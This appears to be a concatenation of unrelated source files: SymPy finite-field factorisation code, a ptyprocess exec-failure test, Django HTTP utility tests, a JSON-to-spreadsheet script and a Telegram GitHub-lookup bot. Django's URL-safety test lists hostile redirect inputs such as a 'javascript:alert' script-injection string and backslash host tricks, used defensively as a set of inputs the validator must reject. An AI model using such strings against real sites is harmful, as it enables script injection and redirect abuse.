>>> gf_sqf_p(ZZ.map([3, 2, 4]), 5, ZZ)
True
>>> gf_sqf_p(ZZ.map([2, 4, 4, 2, 2, 1, 4]), 5, ZZ)
False
"""
_, f = gf_monic(f, p, K)
if not f:
return True
else:
return gf_gcd(f, gf_diff(f, p, K), p, K) == [K.one]
def gf_sqf_part(f, p, K):
"""
Return square-free part of a ``GF(p)[x]`` polynomial.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_sqf_part
>>> gf_sqf_part(ZZ.map([1, 1, 3, 0, 1, 0, 2, 2, 1]), 5, ZZ)
[1, 4, 3]
"""
_, sqf = gf_sqf_list(f, p, K)
g = [K.one]
for f, _ in sqf:
g = gf_mul(g, f, p, K)
return g
def gf_sqf_list(f, p, K, all=False):
"""
Return the square-free decomposition of a ``GF(p)[x]`` polynomial.
Given a polynomial ``f`` in ``GF(p)[x]``, returns the leading coefficient
of ``f`` and a square-free decomposition ``f_1**e_1 f_2**e_2 ... f_k**e_k``
such that all ``f_i`` are monic polynomials and ``(f_i, f_j)`` for ``i != j``
are co-prime and ``e_1 ... e_k`` are given in increasing order. All trivial
terms (i.e. ``f_i = 1``) aren't included in the output.
Consider polynomial ``f = x**11 + 1`` over ``GF(11)[x]``::
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import (
... gf_from_dict, gf_diff, gf_sqf_list, gf_pow,
... )
... # doctest: +NORMALIZE_WHITESPACE
>>> f = gf_from_dict({11: ZZ(1), 0: ZZ(1)}, 11, ZZ)
Note that ``f'(x) = 0``::
>>> gf_diff(f, 11, ZZ)
[]
This phenomenon doesn't happen in characteristic zero. However we can
still compute square-free decomposition of ``f`` using ``gf_sqf()``::
>>> gf_sqf_list(f, 11, ZZ)
(1, [([1, 1], 11)])
We obtained factorization ``f = (x + 1)**11``. This is correct because::
>>> gf_pow([1, 1], 11, 11, ZZ) == f
True
References
==========
1. [Geddes92]_
"""
n, sqf, factors, r = 1, False, [], int(p)
lc, f = gf_monic(f, p, K)
if gf_degree(f) < 1:
return lc, []
while True:
F = gf_diff(f, p, K)
if F != []:
g = gf_gcd(f, F, p, K)
h = gf_quo(f, g, p, K)
i = 1
while h != [K.one]:
G = gf_gcd(g, h, p, K)
H = gf_quo(h, G, p, K)
if gf_degree(H) > 0:
factors.append((H, i*n))
g, h, i = gf_quo(g, G, p, K), G, i + 1
if g == [K.one]:
sqf = True
else:
f = g
if not sqf:
d = gf_degree(f) // r
for i in range(0, d + 1):
f[i] = f[i*r]
f, n = f[:d + 1], n*r
else:
break
if all:
raise ValueError("'all=True' is not supported yet")
return lc, factors
def gf_Qmatrix(f, p, K):
"""
Calculate Berlekamp's ``Q`` matrix.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_Qmatrix
>>> gf_Qmatrix([3, 2, 4], 5, ZZ)
[[1, 0],
[3, 4]]
>>> gf_Qmatrix([1, 0, 0, 0, 1], 5, ZZ)
[[1, 0, 0, 0],
[0, 4, 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 4]]
"""
n, r = gf_degree(f), int(p)
q = [K.one] + [K.zero]*(n - 1)
Q = [list(q)] + [[]]*(n - 1)
for i in range(1, (n - 1)*r + 1):
qq, c = [(-q[-1]*f[-1]) % p], q[-1]
for j in range(1, n):
qq.append((q[j - 1] - c*f[-j - 1]) % p)
if not (i % r):
Q[i//r] = list(qq)
q = qq
return Q
def gf_Qbasis(Q, p, K):
"""
Compute a basis of the kernel of ``Q``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_Qmatrix, gf_Qbasis
>>> gf_Qbasis(gf_Qmatrix([1, 0, 0, 0, 1], 5, ZZ), 5, ZZ)
[[1, 0, 0, 0], [0, 0, 1, 0]]
>>> gf_Qbasis(gf_Qmatrix([3, 2, 4], 5, ZZ), 5, ZZ)
[[1, 0]]
"""
Q, n = [ list(q) for q in Q ], len(Q)
for k in range(0, n):
Q[k][k] = (Q[k][k] - K.one) % p
for k in range(0, n):
for i in range(k, n):
if Q[k][i]:
break
else:
continue
inv = K.invert(Q[k][i], p)
for j in range(0, n):
Q[j][i] = (Q[j][i]*inv) % p
for j in range(0, n):
t = Q[j][k]
Q[j][k] = Q[j][i]
Q[j][i] = t
for i in range(0, n):
if i != k:
q = Q[k][i]
for j in range(0, n):
Q[j][i] = (Q[j][i] - Q[j][k]*q) % p
for i in range(0, n):
for j in range(0, n):
if i == j:
Q[i][j] = (K.one - Q[i][j]) % p
else:
Q[i][j] = (-Q[i][j]) % p
basis = []
for q in Q:
if any(q):
basis.append(q)
return basis
def gf_berlekamp(f, p, K):
"""
Factor a square-free ``f`` in ``GF(p)[x]`` for small ``p``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_berlekamp
>>> gf_berlekamp([1, 0, 0, 0, 1], 5, ZZ)
[[1, 0, 2], [1, 0, 3]]
"""
Q = gf_Qmatrix(f, p, K)
V = gf_Qbasis(Q, p, K)
for i, v in enumerate(V):
V[i] = gf_strip(list(reversed(v)))
factors = [f]
for k in range(1, len(V)):
for f in list(factors):
s = K.zero
while s < p:
g = gf_sub_ground(V[k], s, p, K)
h = gf_gcd(f, g, p, K)
if h != [K.one] and h != f:
factors.remove(f)
f = gf_quo(f, h, p, K)
factors.extend([f, h])
if len(factors) == len(V):
return _sort_factors(factors, multiple=False)
s += K.one
return _sort_factors(factors, multiple=False)
def gf_ddf_zassenhaus(f, p, K):
"""
Cantor-Zassenhaus: Deterministic Distinct Degree Factorization
Given a monic square-free polynomial ``f`` in ``GF(p)[x]``, computes
partial distinct degree factorization ``f_1 ... f_d`` of ``f`` where
``deg(f_i) != deg(f_j)`` for ``i != j``. The result is returned as a
list of pairs ``(f_i, e_i)`` where ``deg(f_i) > 0`` and ``e_i > 0``
is an argument to the equal degree factorization routine.
Consider the polynomial ``x**15 - 1`` in ``GF(11)[x]``::
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_from_dict
>>> f = gf_from_dict({15: ZZ(1), 0: ZZ(-1)}, 11, ZZ)
Distinct degree factorization gives::
>>> from sympy.polys.galoistools import gf_ddf_zassenhaus
>>> gf_ddf_zassenhaus(f, 11, ZZ)
[([1, 0, 0, 0, 0, 10], 1), ([1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1], 2)]
which means ``x**15 - 1 = (x**5 - 1) (x**10 + x**5 + 1)``. To obtain
factorization into irreducibles, use equal degree factorization
procedure (EDF) with each of the factors.
References
==========
1. [Gathen99]_
2. [Geddes92]_
"""
i, g, factors = 1, [K.one, K.zero], []
b = gf_frobenius_monomial_base(f, p, K)
while 2*i <= gf_degree(f):
g = gf_frobenius_map(g, f, b, p, K)
h = gf_gcd(f, gf_sub(g, [K.one, K.zero], p, K), p, K)
if h != [K.one]:
factors.append((h, i))
f = gf_quo(f, h, p, K)
g = gf_rem(g, f, p, K)
b = gf_frobenius_monomial_base(f, p, K)
i += 1
if f != [K.one]:
return factors + [(f, gf_degree(f))]
else:
return factors
def gf_edf_zassenhaus(f, n, p, K):
"""
Cantor-Zassenhaus: Probabilistic Equal Degree Factorization
Given a monic square-free polynomial ``f`` in ``GF(p)[x]`` and
an integer ``n``, such that ``n`` divides ``deg(f)``, returns all
irreducible factors ``f_1,...,f_d`` of ``f``, each of degree ``n``.
EDF procedure gives complete factorization over Galois fields.
Consider the square-free polynomial ``f = x**3 + x**2 + x + 1`` in
``GF(5)[x]``. Let's compute its irreducible factors of degree one::
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_edf_zassenhaus
>>> gf_edf_zassenhaus([1,1,1,1], 1, 5, ZZ)
[[1, 1], [1, 2], [1, 3]]
References
==========
1. [Gathen99]_
2. [Geddes92]_
"""
factors, q = [f], int(p)
if gf_degree(f) <= n:
return factors
N = gf_degree(f) // n
if p != 2:
b = gf_frobenius_monomial_base(f, p, K)
while len(factors) < N:
r = gf_random(2*n - 1, p, K)
if p == 2:
h = r
for i in range(0, 2**(n*N - 1)):
r = gf_pow_mod(r, 2, f, p, K)
h = gf_add(h, r, p, K)
g = gf_gcd(f, h, p, K)
else:
h = _gf_pow_pnm1d2(r, n, f, b, p, K)
g = gf_gcd(f, gf_sub_ground(h, K.one, p, K), p, K)
if g != [K.one] and g != f:
factors = gf_edf_zassenhaus(g, n, p, K) \
+ gf_edf_zassenhaus(gf_quo(f, g, p, K), n, p, K)
return _sort_factors(factors, multiple=False)
def gf_ddf_shoup(f, p, K):
"""
Kaltofen-Shoup: Deterministic Distinct Degree Factorization
Given a monic square-free polynomial ``f`` in ``GF(p)[x]``, computes
partial distinct degree factorization ``f_1,...,f_d`` of ``f`` where
``deg(f_i) != deg(f_j)`` for ``i != j``. The result is returned as a
list of pairs ``(f_i, e_i)`` where ``deg(f_i) > 0`` and ``e_i > 0``
is an argument to the equal degree factorization routine.
This algorithm is an improved version of Zassenhaus algorithm for
large ``deg(f)`` and modulus ``p`` (especially for ``deg(f) ~ lg(p)``).
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_ddf_shoup, gf_from_dict
>>> f = gf_from_dict({6: ZZ(1), 5: ZZ(-1), 4: ZZ(1), 3: ZZ(1), 1: ZZ(-1)}, 3, ZZ)
>>> gf_ddf_shoup(f, 3, ZZ)
[([1, 1, 0], 1), ([1, 1, 0, 1, 2], 2)]
References
==========
1. [Kaltofen98]_
2. [Shoup95]_
3. [Gathen92]_
"""
n = gf_degree(f)
k = int(_ceil(_sqrt(n//2)))
b = gf_frobenius_monomial_base(f, p, K)
h = gf_frobenius_map([K.one, K.zero], f, b, p, K)
# U[i] = x**(p**i)
U = [[K.one, K.zero], h] + [K.zero]*(k - 1)
for i in range(2, k + 1):
U[i] = gf_frobenius_map(U[i-1], f, b, p, K)
h, U = U[k], U[:k]
# V[i] = x**(p**(k*(i+1)))
V = [h] + [K.zero]*(k - 1)
for i in range(1, k):
V[i] = gf_compose_mod(V[i - 1], h, f, p, K)
factors = []
for i, v in enumerate(V):
h, j = [K.one], k - 1
for u in U:
g = gf_sub(v, u, p, K)
h = gf_mul(h, g, p, K)
h = gf_rem(h, f, p, K)
g = gf_gcd(f, h, p, K)
f = gf_quo(f, g, p, K)
for u in reversed(U):
h = gf_sub(v, u, p, K)
F = gf_gcd(g, h, p, K)
if F != [K.one]:
factors.append((F, k*(i + 1) - j))
g, j = gf_quo(g, F, p, K), j - 1
if f != [K.one]:
factors.append((f, gf_degree(f)))
return factors
def gf_edf_shoup(f, n, p, K):
"""
Gathen-Shoup: Probabilistic Equal Degree Factorization
Given a monic square-free polynomial ``f`` in ``GF(p)[x]`` and integer
``n`` such that ``n`` divides ``deg(f)``, returns all irreducible factors
``f_1,...,f_d`` of ``f``, each of degree ``n``. This is a complete
factorization over Galois fields.
This algorithm is an improved version of Zassenhaus algorithm for
large ``deg(f)`` and modulus ``p`` (especially for ``deg(f) ~ lg(p)``).
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_edf_shoup
>>> gf_edf_shoup(ZZ.map([1, 2837, 2277]), 1, 2917, ZZ)
[[1, 852], [1, 1985]]
References
==========
1. [Shoup91]_
2. [Gathen92]_
"""
N, q = gf_degree(f), int(p)
if not N:
return []
if N <= n:
return [f]
factors, x = [f], [K.one, K.zero]
r = gf_random(N - 1, p, K)
if p == 2:
h = gf_pow_mod(x, q, f, p, K)
H = gf_trace_map(r, h, x, n - 1, f, p, K)[1]
h1 = gf_gcd(f, H, p, K)
h2 = gf_quo(f, h1, p, K)
factors = gf_edf_shoup(h1, n, p, K) \
+ gf_edf_shoup(h2, n, p, K)
else:
b = gf_frobenius_monomial_base(f, p, K)
H = _gf_trace_map(r, n, f, b, p, K)
h = gf_pow_mod(H, (q - 1)//2, f, p, K)
h1 = gf_gcd(f, h, p, K)
h2 = gf_gcd(f, gf_sub_ground(h, K.one, p, K), p, K)
h3 = gf_quo(f, gf_mul(h1, h2, p, K), p, K)
factors = gf_edf_shoup(h1, n, p, K) \
+ gf_edf_shoup(h2, n, p, K) \
+ gf_edf_shoup(h3, n, p, K)
return _sort_factors(factors, multiple=False)
def gf_zassenhaus(f, p, K):
"""
Factor a square-free ``f`` in ``GF(p)[x]`` for medium ``p``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_zassenhaus
>>> gf_zassenhaus(ZZ.map([1, 4, 3]), 5, ZZ)
[[1, 1], [1, 3]]
"""
factors = []
for factor, n in gf_ddf_zassenhaus(f, p, K):
factors += gf_edf_zassenhaus(factor, n, p, K)
return _sort_factors(factors, multiple=False)
def gf_shoup(f, p, K):
"""
Factor a square-free ``f`` in ``GF(p)[x]`` for large ``p``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_shoup
>>> gf_shoup(ZZ.map([1, 4, 3]), 5, ZZ)
[[1, 1], [1, 3]]
"""
factors = []
for factor, n in gf_ddf_shoup(f, p, K):
factors += gf_edf_shoup(factor, n, p, K)
return _sort_factors(factors, multiple=False)
_factor_methods = {
'berlekamp': gf_berlekamp, # ``p`` : small
'zassenhaus': gf_zassenhaus, # ``p`` : medium
'shoup': gf_shoup, # ``p`` : large
}
def gf_factor_sqf(f, p, K, method=None):
"""
Factor a square-free polynomial ``f`` in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_factor_sqf
>>> gf_factor_sqf(ZZ.map([3, 2, 4]), 5, ZZ)
(3, [[1, 1], [1, 3]])
"""
lc, f = gf_monic(f, p, K)
if gf_degree(f) < 1:
return lc, []
method = method or query('GF_FACTOR_METHOD')
if method is not None:
factors = _factor_methods[method](f, p, K)
else:
factors = gf_zassenhaus(f, p, K)
return lc, factors
def gf_factor(f, p, K):
"""
Factor (non square-free) polynomials in ``GF(p)[x]``.
Given a possibly non square-free polynomial ``f`` in ``GF(p)[x]``,
returns its complete factorization into irreducibles::
f_1(x)**e_1 f_2(x)**e_2 ... f_d(x)**e_d
where each ``f_i`` is a monic polynomial and ``gcd(f_i, f_j) == 1``,
for ``i != j``. The result is given as a tuple consisting of the
leading coefficient of ``f`` and a list of factors of ``f`` with
their multiplicities.
The algorithm proceeds by first computing square-free decomposition
of ``f`` and then iteratively factoring each of square-free factors.
Consider a non square-free polynomial ``f = (7*x + 1) (x + 2)**2`` in
``GF(11)[x]``. We obtain its factorization into irreducibles as follows::
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_factor
>>> gf_factor(ZZ.map([5, 2, 7, 2]), 11, ZZ)
(5, [([1, 2], 1), ([1, 8], 2)])
We arrived with factorization ``f = 5 (x + 2) (x + 8)**2``. We didn't
recover the exact form of the input polynomial because we requested to
get monic factors of ``f`` and its leading coefficient separately.
Square-free factors of ``f`` can be factored into irreducibles over
``GF(p)`` using three very different methods:
Berlekamp
efficient for very small values of ``p`` (usually ``p < 25``)
Cantor-Zassenhaus
efficient on average input and with "typical" ``p``
Shoup-Kaltofen-Gathen
efficient with very large inputs and modulus
If you want to use a specific factorization method, instead of the default
one, set ``GF_FACTOR_METHOD`` with one of ``berlekamp``, ``zassenhaus`` or
``shoup`` values.
References
==========
1. [Gathen99]_
"""
lc, f = gf_monic(f, p, K)
if gf_degree(f) < 1:
return lc, []
factors = []
for g, n in gf_sqf_list(f, p, K)[1]:
for h in gf_factor_sqf(g, p, K)[1]:
factors.append((h, n))
return lc, _sort_factors(factors)
def gf_value(f, a):
"""
Value of polynomial 'f' at 'a' in field R.
Examples
========
>>> from sympy.polys.galoistools import gf_value
>>> gf_value([1, 7, 2, 4], 11)
2204
"""
result = 0
for c in f:
result *= a
result += c
return result
def linear_congruence(a, b, m):
"""
Returns the values of x satisfying a*x congruent b mod(m)
Here m is positive integer and a, b are natural numbers.
This function returns only those values of x which are distinct mod(m).
Examples
========
>>> from sympy.polys.galoistools import linear_congruence
>>> linear_congruence(3, 12, 15)
[4, 9, 14]
There are 3 solutions distinct mod(15) since gcd(a, m) = gcd(3, 15) = 3.
**Reference**
1) Wikipedia http://en.wikipedia.org/wiki/Linear_congruence_theorem
"""
from sympy.polys.polytools import gcdex
if a % m == 0:
if b % m == 0:
return list(range(m))
else:
return []
r, _, g = gcdex(a, m)
if b % g != 0:
return []
return [(r * b // g + t * m // g) % m for t in range(g)]
def _raise_mod_power(x, s, p, f):
"""
Used in gf_csolve to generate solutions of f(x) cong 0 mod(p**(s + 1))
from the solutions of f(x) cong 0 mod(p**s).
Examples
========
>>> from sympy.polys.galoistools import _raise_mod_power
>>> from sympy.polys.galoistools import csolve_prime
These is the solutions of f(x) = x**2 + x + 7 cong 0 mod(3)
>>> f = [1, 1, 7]
>>> csolve_prime(f, 3)
[1]
>>> [ i for i in range(3) if not (i**2 + i + 7) % 3]
[1]
The solutions of f(x) cong 0 mod(9) are constructed from the
values returned from _raise_mod_power:
>>> x, s, p = 1, 1, 3
>>> V = _raise_mod_power(x, s, p, f)
>>> [x + v * p**s for v in V]
[1, 4, 7]
And these are confirmed with the following:
>>> [ i for i in range(3**2) if not (i**2 + i + 7) % 3**2]
[1, 4, 7]
"""
from sympy.polys.domains import ZZ
f_f = gf_diff(f, p, ZZ)
alpha = gf_value(f_f, x)
beta = - gf_value(f, x) // p**s
return linear_congruence(alpha, beta, p)
def csolve_prime(f, p, e=1):
"""
Solutions of f(x) congruent 0 mod(p**e).
Examples
========
>>> from sympy.polys.galoistools import csolve_prime
>>> csolve_prime([1, 1, 7], 3, 1)
[1]
>>> csolve_prime([1, 1, 7], 3, 2)
[1, 4, 7]
Solutions [7, 4, 1] (mod 3**2) are generated by ``_raise_mod_power()``
from solution [1] (mod 3).
"""
from sympy.polys.domains import ZZ
X1 = [i for i in range(p) if gf_eval(f, i, p, ZZ) == 0]
if e == 1:
return X1
X = []
S = list(zip(X1, [1]*len(X1)))
while S:
x, s = S.pop()
if s == e:
X.append(x)
else:
s1 = s + 1
ps = p**s
S.extend([(x + v*ps, s1) for v in _raise_mod_power(x, s, p, f)])
return sorted(X)
def gf_csolve(f, n):
"""
To solve f(x) congruent 0 mod(n).
n is divided into canonical factors and f(x) cong 0 mod(p**e) will be
solved for each factor. Applying the Chinese Remainder Theorem to the
results returns the final answers.
Examples
========
Solve [1, 1, 7] congruent 0 mod(189):
>>> from sympy.polys.galoistools import gf_csolve
>>> gf_csolve([1, 1, 7], 189)
[13, 49, 76, 112, 139, 175]
References
==========
[1] 'An introduction to the Theory of Numbers' 5th Edition by Ivan Niven,
Zuckerman and Montgomery.
"""
from sympy.polys.domains import ZZ
P = factorint(n)
X = [csolve_prime(f, p, e) for p, e in P.items()]
pools = list(map(tuple, X))
perms = [[]]
for pool in pools:
perms = [x + [y] for x in perms for y in pool]
dist_factors = [pow(p, e) for p, e in P.items()]
return sorted([gf_crt(per, dist_factors, ZZ) for per in perms])
|
outofmem0ry/incubator-hawq | refs/heads/master | tools/bin/pythonSrc/ptyprocess-0.5.1/tests/test_invalid_binary.py | 11 | #!/usr/bin/env python
'''
PEXPECT LICENSE
This license is approved by the OSI and FSF as GPL-compatible.
http://opensource.org/licenses/isc-license.txt
Copyright (c) 2012, Noah Spurrier <[email protected]>
PERMISSION TO USE, COPY, MODIFY, AND/OR DISTRIBUTE THIS SOFTWARE FOR ANY
PURPOSE WITH OR WITHOUT FEE IS HEREBY GRANTED, PROVIDED THAT THE ABOVE
COPYRIGHT NOTICE AND THIS PERMISSION NOTICE APPEAR IN ALL COPIES.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
'''
import time
import unittest
from ptyprocess import PtyProcess, PtyProcessUnicode
import errno
import os
import stat
import tempfile
class InvalidBinaryChars(unittest.TestCase):
def test_invalid_binary(self):
'''This tests that we correctly handle the case where we attempt to
spawn a child process but the exec call fails'''
# Create a file that should fail the exec call
dirpath = tempfile.mkdtemp()
fullpath = os.path.join(dirpath, "test")
with open(fullpath, 'wb') as f:
# Add some constant so it will never be executable
# - Not 0x54AD (Windows PE)
# - Not 0x7FEF (ELF)
# - Not 0410 or 0413 (a.out)
# - Not 0x2321 (script)
file_start = b'\x00\x00'
file_data = file_start + os.urandom(1022)
f.write(file_data)
# Make it executable
st = os.stat(fullpath)
os.chmod(fullpath, st.st_mode | stat.S_IEXEC)
# TODO Verify this does what is intended on Windows
try:
child = PtyProcess.spawn([fullpath])
# If we get here then an OSError was not raised
child.close()
raise AssertionError("OSError was not raised")
except OSError as err:
if errno.ENOEXEC == err.errno:
# This is what should happen
pass
else:
# Re-raise the original error to fail the test
raise
finally:
os.unlink(fullpath)
os.rmdir(dirpath)
if __name__ == '__main__':
unittest.main()
suite = unittest.makeSuite(InvalidBinaryChars,'test')
|
xwolf12/django | refs/heads/master | tests/utils_tests/test_http.py | 220 | from __future__ import unicode_literals
import sys
import unittest
from datetime import datetime
from django.utils import http, six
from django.utils.datastructures import MultiValueDict
class TestUtilsHttp(unittest.TestCase):
def test_same_origin_true(self):
# Identical
self.assertTrue(http.same_origin('http://foo.com/', 'http://foo.com/'))
# One with trailing slash - see #15617
self.assertTrue(http.same_origin('http://foo.com', 'http://foo.com/'))
self.assertTrue(http.same_origin('http://foo.com/', 'http://foo.com'))
# With port
self.assertTrue(http.same_origin('https://foo.com:8000', 'https://foo.com:8000/'))
# No port given but according to RFC6454 still the same origin
self.assertTrue(http.same_origin('http://foo.com', 'http://foo.com:80/'))
self.assertTrue(http.same_origin('https://foo.com', 'https://foo.com:443/'))
def test_same_origin_false(self):
# Different scheme
self.assertFalse(http.same_origin('http://foo.com', 'https://foo.com'))
# Different host
self.assertFalse(http.same_origin('http://foo.com', 'http://goo.com'))
# Different host again
self.assertFalse(http.same_origin('http://foo.com', 'http://foo.com.evil.com'))
# Different port
self.assertFalse(http.same_origin('http://foo.com:8000', 'http://foo.com:8001'))
# No port given
self.assertFalse(http.same_origin('http://foo.com', 'http://foo.com:8000/'))
self.assertFalse(http.same_origin('https://foo.com', 'https://foo.com:8000/'))
def test_urlencode(self):
# 2-tuples (the norm)
result = http.urlencode((('a', 1), ('b', 2), ('c', 3)))
self.assertEqual(result, 'a=1&b=2&c=3')
# A dictionary
result = http.urlencode({'a': 1, 'b': 2, 'c': 3})
acceptable_results = [
# Need to allow all of these as dictionaries have to be treated as
# unordered
'a=1&b=2&c=3',
'a=1&c=3&b=2',
'b=2&a=1&c=3',
'b=2&c=3&a=1',
'c=3&a=1&b=2',
'c=3&b=2&a=1'
]
self.assertIn(result, acceptable_results)
result = http.urlencode({'a': [1, 2]}, doseq=False)
self.assertEqual(result, 'a=%5B%271%27%2C+%272%27%5D')
result = http.urlencode({'a': [1, 2]}, doseq=True)
self.assertEqual(result, 'a=1&a=2')
result = http.urlencode({'a': []}, doseq=True)
self.assertEqual(result, '')
# A MultiValueDict
result = http.urlencode(MultiValueDict({
'name': ['Adrian', 'Simon'],
'position': ['Developer']
}), doseq=True)
acceptable_results = [
# MultiValueDicts are similarly unordered
'name=Adrian&name=Simon&position=Developer',
'position=Developer&name=Adrian&name=Simon'
]
self.assertIn(result, acceptable_results)
def test_base36(self):
# reciprocity works
for n in [0, 1, 1000, 1000000]:
self.assertEqual(n, http.base36_to_int(http.int_to_base36(n)))
if six.PY2:
self.assertEqual(sys.maxint, http.base36_to_int(http.int_to_base36(sys.maxint)))
# bad input
self.assertRaises(ValueError, http.int_to_base36, -1)
if six.PY2:
self.assertRaises(ValueError, http.int_to_base36, sys.maxint + 1)
for n in ['1', 'foo', {1: 2}, (1, 2, 3), 3.141]:
self.assertRaises(TypeError, http.int_to_base36, n)
for n in ['#', ' ']:
self.assertRaises(ValueError, http.base36_to_int, n)
for n in [123, {1: 2}, (1, 2, 3), 3.141]:
self.assertRaises(TypeError, http.base36_to_int, n)
# more explicit output testing
for n, b36 in [(0, '0'), (1, '1'), (42, '16'), (818469960, 'django')]:
self.assertEqual(http.int_to_base36(n), b36)
self.assertEqual(http.base36_to_int(b36), n)
def test_is_safe_url(self):
for bad_url in ('http://example.com',
'http:///example.com',
'https://example.com',
'ftp://exampel.com',
r'\\example.com',
r'\\\example.com',
r'/\\/example.com',
r'\\\example.com',
r'\\example.com',
r'\\//example.com',
r'/\/example.com',
r'\/example.com',
r'/\example.com',
'http:///example.com',
'http:/\//example.com',
'http:\/example.com',
'http:/\example.com',
'javascript:alert("XSS")',
'\njavascript:alert(x)',
'\x08//example.com',
'\n'):
self.assertFalse(http.is_safe_url(bad_url, host='testserver'), "%s should be blocked" % bad_url)
for good_url in ('/view/?param=http://example.com',
'/view/?param=https://example.com',
'/view?param=ftp://exampel.com',
'view/?param=//example.com',
'https://testserver/',
'HTTPS://testserver/',
'//testserver/',
'/url%20with%20spaces/'):
self.assertTrue(http.is_safe_url(good_url, host='testserver'), "%s should be allowed" % good_url)
def test_urlsafe_base64_roundtrip(self):
bytestring = b'foo'
encoded = http.urlsafe_base64_encode(bytestring)
decoded = http.urlsafe_base64_decode(encoded)
self.assertEqual(bytestring, decoded)
def test_urlquote(self):
self.assertEqual(http.urlquote('Paris & Orl\xe9ans'),
'Paris%20%26%20Orl%C3%A9ans')
self.assertEqual(http.urlquote('Paris & Orl\xe9ans', safe="&"),
'Paris%20&%20Orl%C3%A9ans')
self.assertEqual(
http.urlunquote('Paris%20%26%20Orl%C3%A9ans'),
'Paris & Orl\xe9ans')
self.assertEqual(
http.urlunquote('Paris%20&%20Orl%C3%A9ans'),
'Paris & Orl\xe9ans')
self.assertEqual(http.urlquote_plus('Paris & Orl\xe9ans'),
'Paris+%26+Orl%C3%A9ans')
self.assertEqual(http.urlquote_plus('Paris & Orl\xe9ans', safe="&"),
'Paris+&+Orl%C3%A9ans')
self.assertEqual(
http.urlunquote_plus('Paris+%26+Orl%C3%A9ans'),
'Paris & Orl\xe9ans')
self.assertEqual(
http.urlunquote_plus('Paris+&+Orl%C3%A9ans'),
'Paris & Orl\xe9ans')
class ETagProcessingTests(unittest.TestCase):
def test_parsing(self):
etags = http.parse_etags(r'"", "etag", "e\"t\"ag", "e\\tag", W/"weak"')
self.assertEqual(etags, ['', 'etag', 'e"t"ag', r'e\tag', 'weak'])
def test_quoting(self):
quoted_etag = http.quote_etag(r'e\t"ag')
self.assertEqual(quoted_etag, r'"e\\t\"ag"')
class HttpDateProcessingTests(unittest.TestCase):
def test_http_date(self):
t = 1167616461.0
self.assertEqual(http.http_date(t), 'Mon, 01 Jan 2007 01:54:21 GMT')
def test_cookie_date(self):
t = 1167616461.0
self.assertEqual(http.cookie_date(t), 'Mon, 01-Jan-2007 01:54:21 GMT')
def test_parsing_rfc1123(self):
parsed = http.parse_http_date('Sun, 06 Nov 1994 08:49:37 GMT')
self.assertEqual(datetime.utcfromtimestamp(parsed),
datetime(1994, 11, 6, 8, 49, 37))
def test_parsing_rfc850(self):
parsed = http.parse_http_date('Sunday, 06-Nov-94 08:49:37 GMT')
self.assertEqual(datetime.utcfromtimestamp(parsed),
datetime(1994, 11, 6, 8, 49, 37))
def test_parsing_asctime(self):
parsed = http.parse_http_date('Sun Nov 6 08:49:37 1994')
self.assertEqual(datetime.utcfromtimestamp(parsed),
datetime(1994, 11, 6, 8, 49, 37))
|
haiyangd/python-show-me-the-code- | refs/heads/master | agmcs/0014/0014.py | 40 | #coding:utf-8
import json
import xlwt
with open('student.txt','r')as f:
data = f.read().decode('gbk')
data = json.loads(data)
book =xlwt.Workbook(encoding = 'utf-8')
sheet =book.add_sheet('student')
for i in range(len(data)):
d = data[str(i+1)]
sheet.write(i,0,i+1)
for j in range(len(d)):
sheet.write(i,j+1,d[j])
book.save('student.xls')
|
alomina007/github | refs/heads/master | main.py | 1 | import telebot
import urllib
from telebot import types
import requests
import json
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
bot = telebot.TeleBot('') # makan token shoma
@bot.message_handler(commands=['start', 'help'])
def m(m):
markup = types.InlineKeyboardMarkup()
markup.add(types.InlineKeyboardButton('کانال ما', url = 'https://telegram.me/SuDo_Tm'))
bot.send_message(m.chat.id, 'Hi Welcome \ncommands : \n/git [username]\n\ndeveloper :SuDo™', reply_markup=markup)
print 'bot send help command'
@bot.message_handler(regexp='^(/git) (.*)')
def gif(m):
text = m.text.split()[1]
r = requests.get('https://api.github.com/users/{}'.format(text))
json_data = r.json()
if 'id' in json_data:
url_html = json_data['html_url']
typee = json_data['type']
name = json_data['name']
company = json_data['company']
blog = json_data['blog']
location = json_data['location']
bio = json_data['bio']
public_repos = json_data['public_repos']
followers = json_data['followers']
following = json_data['following']
avatar_url = json_data['avatar_url']
urllib.urlretrieve("{}".format(avatar_url), "git.png")
bot.send_sticker(m.chat.id, open('git.png'))
